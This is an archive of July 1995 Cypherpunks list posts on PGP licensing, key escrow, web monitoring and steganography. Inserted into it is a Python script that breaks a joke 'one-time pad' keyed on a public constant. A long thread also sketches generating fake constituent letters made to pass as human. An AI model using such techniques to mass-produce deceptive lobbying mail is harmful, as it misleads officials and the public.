Message-ID: <Pine.ULT.3.91.950718210509.19834D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 18 Jul 1995, L. McCarthy wrote:

> Duplicates of some of Bob Hayden's articles have been appearing via NNTP
> from krypton.mankato.msu.edu lately, too.

I've been posting those duplicate articles to alt.security.pgp at the same
time (using pine as a mailer/news poster), so I'm assuming that somebody's
news server is getting the message and passing it to the mail address. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 18 Jul 95 17:29:22 PDT
To: jim@acm.org
Subject: Re: Is it legal for commercial companies to use PGP?
In-Reply-To: <199507182358.QAA10553@mycroft.rand.org>
Message-ID: <m0sYNhb-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> > Rick Busdiecker <rfb@lehman.com> writes:
> >   From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
> 
> >   In practice, I'd probably buy Viacrypt for legal reasons but use
> >   PGP anyway.
> 
> >I'd be interested in hearing some of the lawyers out there comment on
> >this.
> 
> Does RSADSI count as having lawyers?  So far as I know they have not
> commented in public about whether the ViaCrypt license is valid, but
> they have also not (to my knowledge) contested it.  However, Jim Bidzos
> has explicitly said that it is not acceptable to buy a ViaCrypt license
> to cover your use of non-ViaCrypt PGP.
> 
> 	Jim Gillogly
> 	Hevensday, 25 Afterlithe S.R. 1995, 23:53

IANAL, but I find this position to be stretching the limits of
credible grounds for a successful lawsuit.  My reasoning is that most
(all?) patent and copyright lawsuits are based on theft of services or
other forms of lost income.  If you collected a fee for a usage that
was identical in function to one that actually took place, (or even
close) I don't see how you could argue that any income was lost.

Technically he can decide what to allow as the license 'owner'/controller,
but that's different from having standing to sue.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <wd803@freenet.victoria.bc.ca>
Date: Tue, 18 Jul 95 21:25:53 PDT
To: cypherpunks@toad.com
Subject: Automatic Rant generator
Message-ID: <Pine.2.2.9507182108.A29780@vifa1>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Date:     Mon Jul 17, 1995  5:22 pm  GMT
From:     Timothy C. May
Subject:  Automated Rant Generators and Letter Generators
 
At 7:35 AM 7/17/95, Martin Hamilton wrote:
>MONTY HARDER writes:
>
>| Anyone who has read MAD Magazine could put such together. As an added
>| bonus, use variable margin settings, and none of the letters would be
>| exactly the same. Appropriate Imail => FAX software on a puter in DC
>| (local call that way) with the phone number of the sender filled in on
>| the top line for ID (izzat legal?) so it doesn't look like a form letter
>| at all.
>
>Plus - choose the fonts & point sizes at random too ? :-)

    Tim May > Cypherpunks could probably have an effect on
    Tim May > hastening this "denial of service" attack on the 
    Tim May > efficacy of letter-writing by releasing an easy-to- 
    Tim May > use package that does all this letter writing at 
    Tim May > the click of a button....just type in some key
    Tim May > words, for the topics, and it does the rest.

    Tim May > An interesting project, actually.

    Actually, your little project could cause some major problems 
    in an area you may not anticipate  --- personnel selection.

    Specifically, the use of Handwriting Analysis as a tool for 
    personnel profiling.

Date:     Mon Jul 17, 1995 11:48 pm  GMT
From:     Harry Bartholomew
Subject:  Re: Automated Rant Generators and Letter Generators
 
    Harry > A final step might be to interface the output to old 
    Harry > pen plotters like my HP7470A with an ascii-to-
    Harry > handwriting program.  Akin to the White House
    Harry > souvenir signature generator, but with a set of
    Harry > parameters to mimic different "hands".  Knuth's
    Harry > Metafont tricks come to mind. 

    Making the little problem Tim presents, a major headache for 
    somebody else --- handwriting analysts.

Date:     Tue Jul 18, 1995  1:18 am  GMT
From:     Timothy C. May
Subject:  Re: Automated Rant Generators and Letter Generators
 
    Tim May > Bart's comments about using Knuth's typographic
    Tim May > work are interesting, to the extent that letters 
    Tim May > need to look handwritten. In the Mac market, it's 
    Tim May > possible to send in some handwriting samples and 
    Tim May > get back a font that emulates the handwriting!

    Actually, True Type fonts of your handwriting are available, 
    for any platform that accepts that font type.  I don't have 
    the URL for them, but there is a pointer to it at 
    HTTP://www.ntu.ac.sg/~tjlow/gclub.html
    
    Tim May > I don't think the pen plotter is actually needed- 
    Tim May > - and few  people would use it--as most fax can

    Using it would play hell for handwriting analysts, though.  
    And if it was programmed to change the pen pressure as well 
    --- the possibilities are staggering.  Can a pen plotter 
    change pressure?

    Tim May > be emulated with laser printers (due of course to
    Tim May > the limited dots per inch resolution). In fact,
    Tim May > most fax modems can directly fax from any screen 
    Tim May > that can produce printed output. So, the
    Tim May > combination of handwriting fonts, automated rant 
    Tim May > generators (of varying rabidities), and fax
    Tim May > capabilities gives a pretty good start. Using lots 
    Tim May > of handwriting samples, various other fonts, and a 
    Tim May > mix of styles in the letters will help.

    Tim May > Anyway, where this all gets interesting is the
    Tim May > following: * Can a kind of Turing Test be tried
    Tim May > here?

    But of course.
    

    Tim May > That is, in this limited domain of "letters to the  
    Tim May > editor/Congressmen," can a letter generator be
    Tim May > implemented which generates letters effectively
    Tim May > indistinguishable from letters and fax generated 
    Tim May > by actual human beings? ("Effectively
    Tim May > indistinguishable" in the sense that a human reader 
    Tim May > could not sort a set of letters into human- and
    Tim May > machine-generated subsets with statistically
    Tim May > significant certainty better than guessing).

    I don't remember the title, but at least one French novel was 
    rumored to have been entirely generated by computer.  

    Tim May > Of course this is also similar to the "style
    Tim May > detectors" we so  often talk about.

    I don't remember the program name, but there is software 
    available now, that analyzes a document, and figures out who 
    wrote it --- based on the frequency count of the letters of 
    the alphabet.  Secondary measures are frequency counts of 
    letter pairs.  Words, phrases, sentences etc are totally 
    ignored.  So what you'd need to do here, to pass your pseudo- 
    Turing Test is a program that generates different statistical 
    results, for allegedly different people.   

    Tim May > The crypto relevance has to do with detecting
    Tim May > patterns in  letters and rants, in emulating these 
    Tim May > patterns, and (perhaps) in speeding up lobbying. 
    Tim May > (Though I agree that widespread adoption of
    Tim May > automated letter-writing, such as the direct mail 
    Tim May > folks are already doing, will eventually just kill 
    Tim May > off letter writing as a means of lobbying.)

    Tim May > This may also hasten the adoption, someday, of
    Tim May > digital  signatures. Congressmen and their aides 
    Tim May > may check incoming letters against databases of
    Tim May > their constituents who have "registered" with them 
    Tim May > (lots of issues here).

    Or might just subject all mail to various automations, which 
    accept/reject mail, based on what it looks for.  << If it 
    passes the congress person's Turing Test, it is read, as being 
    authentic --- although I doubt half the people in the capital 
    could actually pass a Turing Test to begin with.  >>

    Tim May > Merely counting the "yes" and "no" letters has long 
    Tim May > been  problematic, as the Republicans have been
    Tim May > leading in direct mail campaigns since at least the 
    Tim May > mid-70s (recall Richard Viguerie...). Increased
    Tim May > automation will just make it even more obvious.

Date:     Tue Jul 18, 1995  5:23 pm  GMT
From:     Timothy C. May
Subject:  Re: Automated Rant Generators and Letter Generators
 
    Tim May > David Conrad told me he meant for this to go to the 
    Tim May > whole  list, but only sent it to me by mistake. So 
    Tim May > here is his post.


At 4:14 PM 7/18/95, David R. Conrad wrote:
>Tim May <tcmay@sensemedia.net> writes:
>>Bart's comments about using Knuth's typographic work are interesting, to
>>the extent that letters need to look handwritten. In the Mac market, it's
>>possible to send in some handwriting samples and get back a font that
>>emulates the handwriting!
>
>I suppose the resulting font has only one form for each letter?  (Although
>I understand that when you send them a sample, you send several instances
>of each letter; a friend was showing me an ad for this.)  The fact that
>each letter is the same every time would be a giveaway.  We need something
>like Metafont, or at least choose from a number of different shapes.
>
>>                                                 ... So, the combination of
>>handwriting fonts, automated rant generators (of varying rabidities), and
>>fax capabilities gives a pretty good start. Using lots of handwriting
>>samples, various other fonts, and a mix of styles in the letters will help.
>
>Another factor that would make it appear more authentic would be spelling
>and grammar errors.  The grammar errors could be built into the rant
>generators (an occasional dangling modifier, an incomplete sentence or two);
>spelling errors could be done by post-processing the output of the rantgens.
>It's important to take into account the different types of spellos that
>occur: commonly misspelled words (aquired, beleive); wrong homophone (their,
>they're, there; two, to, too); transposed letters (transpoesd); near-misses
>on qwerty keyboards (nesr-mosses); and words left out.
>
>--
>David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
>Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
>Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
>No, his mind is not for rent to any god or government.

    Actually, the usual give away, is in letter and letter pair 
    frequencies --- not spelling mistakes, grammatical errors, 
    etc.

    However, there is a technique called _Scientific Content 
    ANalysis_ that looks at how things are said, to judge their 
    "truthfulness."  A good program will not show that the text 
    was randomly generated, nor show that the author is off-the- 
    wall, so to speak.

    You may have bitten off a bit more than you can chew here.  
    OTOH, a group that tries to crack keys, knowing that the 
    possibility of success is slim to non-existent, can probably 
    pull this one off --- if only because the possibility of 
    success is pretty good.  

    Er, how did the cracking of the key go?   Last I read 60+%, 
    and no hints of it being broken.   << I almost want to 
    participate, but with a dx25, running NovellDos, I'm not sure 
    what that platform could do.  << I'll graduate to Linux, 
    after I buy some more memory, and a new hard drive for that 
    system.  >>  >>  

    xan

    jonathon


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 18 Jul 95 22:03:37 PDT
To: cypherpunks@toad.com
Subject: Govt mandated key
Message-ID: <9507190503.AA05987@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


If I have to pay for each key that I use, then
I have a particular key in mind for my one time 
pad.  It's a single (transcendental) number that 
starts with a decimal point.  It's the binary 
equivalent of the decimal number:

.012345678910111213141516171819202122......

I promise to only use this one key, and I'll just
select a random offset into it for each message.

Rick F. Hoselton  (who doesn't claim to present opinions for others)
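
Why such a key would not behave like a one-time pad, as an added example (not part of the original message): the constant is public and computable by anyone, so the offset is the only secret, and one known header line gives it away. Byte-wise offsets, the 256-byte pad length, the sample message and all function names are assumptions made here.

```python
from itertools import count


def champernowne_prefix(min_digits):
    """Return (d, m): the first m >= min_digits digits of .0123456789101112...
    as the integer d, so that d / 10**m <= constant < (d + 1) / 10**m."""
    d, m = 0, 0
    for i in count(0):
        k = len(str(i))
        d = d * 10 ** k + i
        m += k
        if m >= min_digits:
            return d, m


def pad_bytes(n_bytes):
    """Exact first n_bytes of the binary expansion of the constant."""
    n_bits = 8 * n_bytes
    want = n_bits // 3 + 16          # more than n_bits * log10(2) decimal digits
    while True:
        d, m = champernowne_prefix(want)
        lo = (d << n_bits) // 10 ** m
        hi = ((d + 1) << n_bits) // 10 ** m
        if lo == hi:                 # truncation cannot change any of the bits
            return lo.to_bytes(n_bytes, "big")
        want *= 2


def xor(a, b):
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(plaintext, offset, pad):
    """XOR with the pad starting at a secret offset (decryption is identical)."""
    return xor(plaintext, pad[offset:offset + len(plaintext)])


def recover_offsets(ciphertext, crib, pad):
    """Offsets at which the public pad reproduces a known plaintext prefix."""
    fragment = xor(ciphertext, crib)          # keystream bytes under the crib
    last = len(pad) - len(ciphertext)
    return [i for i in range(last + 1) if pad[i:i + len(fragment)] == fragment]


def read_without_key(ciphertext, crib, pad):
    """Recover every plaintext consistent with the crib, no secret needed."""
    return [encrypt(ciphertext, i, pad) for i in recover_offsets(ciphertext, crib, pad)]


# Constructed sample: a message whose first line an observer can guess.
CRIB = b"To: cypherpunks@toad.com"
MESSAGE = CRIB + b"\n\nmeet at noon"

if __name__ == "__main__":
    pad = pad_bytes(256)
    ct = encrypt(MESSAGE, 97, pad)            # 97 stands in for the random offset
    print(recover_offsets(ct, CRIB, pad))
    print(read_without_key(ct, CRIB, pad))
```

Even without a crib the offset space is only as large as the pad, so trying every offset and keeping the readable result works as well.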




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 18 Jul 95 18:31:44 PDT
To: monty.harder@famend.com
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD747E.00030001AC.uuout@famend.com>
Message-ID: <m0sYOfg-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> PE> Rather than spend five minutes writing something on your own you'd end
> PE> up something that looks totally fake.  I believe that what is going on
> 
>   No, that's "rather than not writing anything at all". I know how to
> call and write to my congresscritters. The idea of the WWW page is for
> those who wouldn't take the initiative to do it in the first place.
> 
> PE> would be discerned by a staffer in moments. Crap like this is called
> 
>   They should know, because they send form letters to constituents all
> the time, only they don't bother to vary it a bit.
> 
> PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.
> 
>   Meanwhile, back at the ranch... If one of our DC members can set up an
> Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
> send things in their own words, if possible, and if they don't have any
> words of their own, they can borrow some. Boilerplate has to be better
> than nothing.

I hereby offer to setup an Email-FAX gateway for the DC/N. VA area if
there is enough interest and some way can be found to defray an Internet
feed, phone line, etc.

Unfortunately I live just over the line where a local line to DC costs
$.50/mo....  At my house it costs $100/mo.  However, I have a number
of friends (and could probably find others) that a PC with Linux
and two phone lines/modems could be placed at to handle this.

I might even have a junk PC that could handle it.

Anyone who spends much on DC faxes now could save a bundle...


I'm familiar with setting up the tpc.int software, so it should integrate
well.

I'm way too busy and overloaded to both pay for and completely set this
up however.

>  * Is there such a thing as a "gruntled" Postal employee?
> ---
>  * Monster@FAmend.Com *    
> 

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Tue, 18 Jul 95 22:28:17 PDT
To: rick hoselton <hoz@univel.telescan.com>
Subject: Re: Govt mandated key
In-Reply-To: <9507190503.AA05987@toad.com>
Message-ID: <Pine.SUN.3.91.950718221833.16687A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 18 Jul 1995, rick hoselton wrote:

> If I have to pay for each key that I use, then
> I have a particular key in mind for my one time 
> pad.  It's a single (transcendental) number that 
> starts with a decimal point.  It's the binary 
> equivalent of the decimal number:
> 
> .012345678910111213141516171819202122......
> 
> I promise to only use this one key, and I'll just
> select a random offset into it for each message.
> 
> Rick F. Hoselton  (who doesn't claim to present opinions for others)
> 
> 
I wouldn't register my keys and I don't think ANY of us should either.
If they threatened me W/ RICO, I would probably register *A* key but 
certainly not one I EVER intended to actually use.
In a case like this I think massive civil disobedience would be a good 
response.
I would like to see a campaign of sending PGP to random Euros or whoever 
has a foreign tag through anon. remailers. Like this UU encode it and daisy
chain it to whoever.
How's that sound?
Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klbarrus@infocom.net (Karl L. Barrus)
Date: Tue, 18 Jul 95 20:57:34 PDT
To: cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
Message-ID: <199507190359.WAA08094@infocom.net>
MIME-Version: 1.0
Content-Type: text/plain


>Webster Network Strategies has announced (but apparently has not
>shipped) a product similar to SurfWatch but aimed at an employment
>environment. The product is called "WebTrack" and supposedly supports
>access lists of URLs, where access can be allowed to "all but these sites"
>or "only to these sites". The product also can be configured to log all 
>Web usage by users subjected to its reign of terror. :) 

Well, I know there are already products like this out there, because the
company I work for uses one.

I was helping my boss/project lead figure out why he couldn't establish an
account on the penet anonymous server, and in the process of phone calls to
various people, we discovered that the anonymous server at penet is blocked
from our site, and also that every web connection is logged.

Actually, I have no problem with this, even if they restrict usenet feed to
the comp hierarchy, restrict web activity to a list of approved sites, log
all they want to, etc.  That's why I got a separate account.


--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ENRIQUE S. IGNARRA" <S0496872@DOMINIC.BARRY.EDU>
Date: Tue, 18 Jul 95 20:02:58 PDT
To: pgp-all%hearn.bitnet@DOMINIC.BARRY.EDU
Subject: Wiping swapfile
Message-ID: <01HT16RSDX3Q000QZQ@DOMINIC.BARRY.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could someone email me or post to the list where I could get utilities to
wipe my windows swapfile so my PGP pass phrase is not stored in it.

I know such utilities exist, but I don't know where to find them.

Any help would be greatly appreciated!


Thanks!

Enrique
s0496872@dominic.barry.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Wed, 19 Jul 95 00:27:00 PDT
To: cypherpunks@toad.com
Subject: RE: Automatic Rant generator
Message-ID: <Chameleon.4.01.2.950719022545.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>That is, in this limited domain of "letters to the editor/
>Congressmen," can a letter generator be implemented which 
>generates letters effectively indistinguishable from letters 
>and fax generated by actual human beings? ("Effectively
>indistinguishable" in the sense that a human reader could 
>not sort a set of letters into human- and machine-generated 
>subsets with statistically significant certainty better than 
>guessing).

>Bart's comments about using Knuth's typographic work are interesting, to
>the extent that letters need to look handwritten. In the Mac market, it's
>possible to send in some handwriting samples and get back a font that
>emulates the handwriting!


Reading this thread it suddenly became clear:

-The appearance of a letter being handwritten is a temporary factor at best.

  Within a very few years (2-3 I would guess) the growth in the use of email 
and the volume of communications to be sorted into For and Against piles will 
cause a sudden and dramatic shift in Congress to a strong preference for 
incoming email.  Within 10 years they may refuse paper mail.  Any month now 
someone in Congress will tip to the fact that email can be processed by 
programs that can identify the issue and the pro or con position of the 
writer.  Constituents will be encouraged to write, but only in the form of 
email, and to state their position clearly and concisely, i.e. in a form 
suitable for successful parsing, analysis, and classification.

-Political letter renderers will become common on the Web before Nov. 1996.

  There are already renderers of graphic images on the Web.  There would be 
more if it were easy to pay with a 25-cent token, and it *will* be widespread 
and easy to do that, very very soon.  Political letter renderers don't have 
to wait for mass participation in online payment mechanisms -- they have 
ready-made sponsors.  Unlike the occasional effort to sponsor phone calls by 
making an 800 number available, sponsors of letter rendering services can be 
sure those services won't be seriously misused:  The 2nd Amendment 
CongressLetter WebPage will *only* render letters *against* H-1234 or *for* 
S-2345, for example.  The Tree Hugger CongressLetter WebPage (no trees died 
for this Page) will *only* render letters *against* H-9876, etc. etc.  Each 
will return the result of the rendering to you at your email address if you 
don't want to copy it off the web page.  *You* will send the email to your 
congresscritter.

The process will be easy:  Right now any decent programmer could write code 
to allow choices from Column A, B, etc. to generate a plausible letter.  
Generalized, this will allow the operators to create templates for each new 
issue, untouched by programmer hands.  Enhancements will make style, grammar, 
spelling, punctuation variations increasingly sophisticated.

-Rendering services will push email over into reality for Congress.

  Strangely, though the rendered letter is in large part a fabrication, it 
will be this ersatz form of personal communication that will finally force 
Congress to accept the reality of email.  Even though generated by computer, 
the rendered letter will still be an expression of a constituent's opinion on 
an issue.  It will rapidly become the preferred method of expression for many 
people who simply don't have time to make a career out of writing to 
politicians.

-Congress will respond with automated mail tallying.

  Whatever chance there is that your present handwritten letter may actually 
be *read* will vanish completely in the age of email.  Your letter will be 
eaten by an analyzer, acknowledged by an intelligent renderer that may even 
refer to passages in your letter (and may even SEEM TO AGREE WITH YOU), and 
then be trashed.  Letters may be sidetracked if they contain certain 
unacceptable things, because the suits have to be kept busy, but most 
incoming mail will vanish after tallying.  

-There could be "agent" wars, but they will not be of consequence.

  In the beginning, the politicos may wish to commission software 
enhancements and intelligence gathering to enable mail scanning agents to 
filter out email generated by letter renderers.  Developers of the analysis 
software may try to find vocabulary and phraseology patterns with which to 
arm the analysis agents to toss rendered letters aside.  

  In the end, though, this will be a losing battle and a counterproductive 
one.  If 50 million rendered letters come in from 50 million real voters, 
they had better *not* be ignored or 50 million voters will take vengeance at 
the polls.  An expression of opinion is an expression of opinion, and the 
sophistication of the tools employed to generate them will be able to stay 
ahead of the technology for detecting them in any case.

-Interaction with Congress may ultimately take the form of battling proxies.

  On the one side are arrayed the forces of the A party, the shining letter 
rendering algorithms, vocab lists, grammar rules, and the latest in provably 
accurate slang and misuse of the language.  On the other side, the forces of 
the B party, with essentially similar tools.  In the middle is Congress, 
gleaming mail analyzers polished and ready.  

  Strangest of all is that all the effort of rendering and analyzing letters 
will go into the creation and consumption of communication particles that may 
eventually never be seen by "author" *or* "recipient."  The electorate will 
express itself by proxy and the elected officials will divine the political 
winds by proxy.  Voters will be hard-sold to sign up for ongoing personally 
authorized letter rendering, so they can go fishing.  Congresscritters will 
be assured that the analyzers will figure out which way the winds are 
blowing, so they can go fishing.  May the best proxy win.  

  Maybe voter and congresscritter will meet somewhere, fishing, and actually 
*communicate*.  Perish the thought!

>>Another factor that would make it appear more authentic would be spelling
>>and grammar errors.  The grammar errors could be built into the rant
>>generators...

There has been a BBS "door" available for several years that does this 
convincingly... if you're a sysop and run a "sysop chat" door but want to 
play mind games when you're not available, SHAMPAGE will answer the user's 
request to page the sysop and chat with him or her.  It is configurable to 
recognize keywords and make random selections from lists of responses to 
those keywords.  It converses believably as if it were a somewhat distracted, 
tired and disjoint human being.

I saw a log of a SHAMPAGE session in which a caller never realized he was 
conversing with a robot.  It kept calling attention to the late hour and 
the caller kept apologizing for the intrusion and asking for a file he 
needed.  As luck would have it, the random utterings and random 
selections of responses to keywords were often right on the mark.  Too weird! 
After several hundred lines of chat the caller finally gathered that the 
"sysop" was really pissed at being kept up so late and logged off, somewhat 
offended himself.  

SHAMPAGE typed in real time, with humanlike varying inter-keystroke timing, 
and made "typos."  It "noticed" its mistakes a few keystrokes later and 
backspaced to correct them.  It typed "hte" instead of "the" and "ign" 
instead of "ing."  It was a riot.  With some enhancement it would be 
completely believable even to the forewarned caller.

I've also seen an incomplete attempt to bring the ELIZA concept up to date 
and implement it as a BBS door.  Though it typed line-at-a-time like a BBS 
teleconference, it still managed to confuse callers into thinking it was a 
real person by simple tricks of inverting pronouns and such.  It, like the 
chat door, seemed to be uncanny at randomly choosing just the right thing to 
say to cinch the caller's presumption that it was a human being.

Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Wed, 19 Jul 95 01:39:17 PDT
To: wd803@freenet.victoria.bc.ca (Jonathon Blake)
Subject: Re: Automatic Rant generator
In-Reply-To: <Pine.2.2.9507182108.A29780@vifa1>
Message-ID: <199507190837.BAA21204@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Jonathon Blake wrote:
> 
>     Actually, True Type fonts of your handwriting are available, 
>     for any platform that accepts that font type.  I don't have 
>     the URL for them, but there is a pointer to it at 
>     HTTP://www.ntu.ac.sg/~tjlow/gclub.html

    The URL itself is:
    Turning Personal handwriting into TrueTypeFont
    (http://execpc.com/~adw/). 
    It includes an interesting .gif file of the producer's handiwork,
    but alas such a font costs $99.

> 
>     Using it would play hell for handwriting analysts, though.  
>     And if it was programmed to change the pen pressure as well 
>     --- the possibilities are staggering.  Can a pen plotter 
>     change pressure?
> 
    Uh, no, one can't change pen pressure, but I think it can be
    mimicked.  If the effect one seeks of changing pen pressure is
    to vary the line width or ink deposited onto the paper then
    varying speed, and/or overwriting with or without offset can
    achieve interesting effects.  If I recall correctly, the HP
    pen position is addressable to 0.001" resolution, (though not
    accuracy.)  I recall creating some nice effects with multiple
    pen colors offset by a few mils in x and y.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Wed, 19 Jul 95 00:49:06 PDT
To: cypherpunks@toad.com
Subject: RE: Stego-Rants ?
Message-ID: <Chameleon.4.01.2.950719024816.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain




Which of the following is the cleartext?
----------------------------------------

1. Bit and byte dropout can significantly impede communication.

2. Flower and shrub planting can greatly enhance landscaping.

3. Word and phrase substitution can hopelessly disguise meaning.

4. UFO and space-alien belief can seriously damage credibility.


If you *presume* my context, you easily identify (3).  If only the wordlists 
that translate between (1), (2) and (4) were available for your inspection, 
you would be up the creek but you wouldn't know it.

Yes, this is aba's "exxon" at work again, and yes, it seems to me that 
deniability through other-plausible-meaning is viable as a form of stego.  
Grammatical correctness is easy to maintain, and care in choosing words can 
preserve much apparent meaning.

Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Tue, 18 Jul 95 23:29:33 PDT
To: cypherpunks@toad.com
Subject: Stego-Rants ?
Message-ID: <Pine.3.89.9507190119.A4722-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a few thoughts:

1. Use the randomness in a computer generated piece of English text to 
hold your real message, encrypted, and obscured.

2. Even more entertaining would be if the foreground text could somehow 
be contrived to be meaningful. I know this would be a "good trick" but 
I'd conjecture that it's possible.  Imagine fractal compression of a text 
file, with the decompression routine adding some "randomness" which would 
be your message, obscured at a very abstract level.  Depending on how 
much "randomness" was added, I'm wondering if the resulting text might 
possibly retain some of its original legibility (?)  I am assuming that 
a companion fractal re-compressing routine would be required to retrieve 
the cypher.

(I am looking at an ad for a graphics program, "Images Incorporated" by 
Iterated Systems which with fractal techniques can achieve 100:1 
compression -- and then -- decompress to 8 times the original bitmap size 
with minimal added distortion.)

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 19 Jul 95 02:59:32 PDT
To: Michael@umlaw.demon.co.uk
Subject: Re: Root Causes Roots cont.
Message-ID: <199507190957.FAA45561@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Professor Froomkin writes:

<snip>

>I always understood "writing code" as in "cypherpunks write code" 
>to mean computer code, that is FORTRAN, C++, assembler, perl or 
>whatever.  I understand "writing IN code" to be the use of 
>cryptographic tools such as codes or cyphers.  

Sorry I misunderstood you, professor. I had always heard those "computer
codes" you mention referred to as "computer languages," and I thought
of "code" as referring to use of cryptography software like Nautilus or 
(of course) PGP. A quick skim of your interesting article reveals that 
this "code" vs. "language" terminology nitpicking is no-doubt as important
to you as it is to me, as we both know that's where legal and political
debates are won and lost. I freely admit my "excess of libertarian 
paranoia," [though I prefer to term my feelings "healthy respect for
world history"]. 

NOTE: I have always been computer-and-math-impaired compared to others
who have been on this list much longer, so I'm *certainly* no final 
authority as to what stuff should be called.

A later post indicates the professor's interesting article is at:

www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

>Thus my claim 
>that the right to write IN code may have existed in the 1790s, 
>but the right to write [computer] code could not (since there 
>were no computers).   

Or alternating current [thank you, Mr. Tesla]. The founders anticipated
inventions such as both of these in Article 1, Section 8.

>Of course, I could be wrong about this, 
>since however you define it, it's debatable whether I'd pass the
>code test to qualify as a cypherpunk, since I stopped writing 
>code when I gave up programming for lawyering, and I didn't start 
>writing in code when I started writing about codes.

I'd certainly flunk *any* C-punk test, unless it involves just 
writing IN code by using PGP for both encryption and authentication,
or the warm feeling I get in my heart for Phil Zimmermann.

>
>In any case it's a matter of definitions, not timelines.
>
>Note: I am not suggesting that the right to write code lacks 
>constitutional protection; just that the protection wouldn't 
>come from the 9th amendment.  

Agreed. As my earlier post (sadly) admitted, the 9th is *NOT* in vogue
these days. I also said that since the 9th is so universally ignored,
it just clutters-up the rest of the Bill of Rights and [perhaps] it 
therefore should be repealed. The people who say, "The 9th Amendment 
means nothing," or "it has no teeth," seem to be the same folks most 
reluctant to even *discuss* repeal, perhaps because discussion would 
inevitably bring publicity to those of us who support a 9th Amendment
*with* _plenty_ of teeth. 

For _much_ better "forgotten 9th" scholarship than my random thoughts
on this list, I suggest the kind and cooperative "market liberal" folks
at the suddenly-influential CATO Institute, located at URL:

http://www.cato.org/main/

<snip>
JMR
Regards, Jim Ray

"It is dangerous to be right when the government is wrong." Voltaire


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 19 Jul 95 04:28:21 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD747E.00030001AC.uuout@famend.com>
Message-ID: <9507191128.AA18103@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



MONTY HARDER writes:
> PE> would be discerned by a staffer in moments. Crap like this is called
> 
>   They should know, because they send form letters to constituents all
> the time, only they don't bother to vary it a bit.

